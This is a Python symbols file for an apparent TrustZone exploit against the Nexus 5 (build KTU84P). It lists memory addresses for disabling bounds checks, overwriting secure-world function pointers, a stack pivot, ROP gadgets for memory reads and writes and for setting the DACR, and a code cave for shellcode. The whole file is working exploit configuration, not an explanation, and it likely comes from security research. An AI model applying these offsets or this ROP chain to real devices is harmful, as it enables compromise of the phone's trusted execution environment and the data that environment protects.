symbols.py

#Symbols for the Nexus 5
#Fingerprint: hammerhead:4.4.4/KTU84P


#The DWORD that needs to be nullified in order to pass all bounds checks
BOUNDS_CHECK_DWORD_ADDRESS = 0xFE828444

#The address of the DWORD which is returned when querying fver_get_version with version code 0
VERSION_CODE_0_DWORD_ADDRESS = 0xFE828994
BOUNDS_CHECKS_RANGE_START = 0xFE8304EC
BOUNDS_CHECKS_RANGE_END = 0xFE8306E8

#The address of the tzbsp_get_diag function pointer
TZBSP_GET_DIAG_POINTER_ADDRESS = 0xFE82D504

#The address of the tzbsp_security_allows_memdump pointer
TZBSP_SECURITY_ALLOWS_MEMDUMP_POINTER_ADDRESS = 0xFE82D584

#The address of the pivot used
MOV_SP_R0_LDMFD_R4_R12_PC = 0xFE856634

#The address of the BX LR gadget
BX_LR = 0xFE806604+1

#The address of the "LDR R0, [R0,R1]; BX LR" gadget
LDR_R0_R0_R1_BX_LR = 0xFE80A994+1

#The address of the "STR R0, [R1]; BX LR" gadget
STR_R0_R1_BX_LR = 0xFE852BB6+1

#The address of the "LDR R1, [R1]; STR R1, [R0]; BX LR" gadget
LDR_R1_R1_STR_R1_R0_BX_LR = 0xFE8131B2+1

#The address of the gadget used to set the DACR
SET_DACR = 0xFE80FCC4

#The address of the address cache invalidation gadget
INVALIDATE_INSTRUCTION_CACHE = 0xFE80F834

#The address of the code cave in which the stub shellcode is written
CODE_CAVE_ADDRESS = 0xFE81DE70
#CODE_CAVE_ADDRESS = 0xFE807798


#The size of the code cave
CODE_CAVE_SIZE = 0x1000 - (CODE_CAVE_ADDRESS & 0xFFF)

#The DWORD used to control whether the log_print_format messages are actually written
ENABLE_LOG_DWORD = 0xFE828A00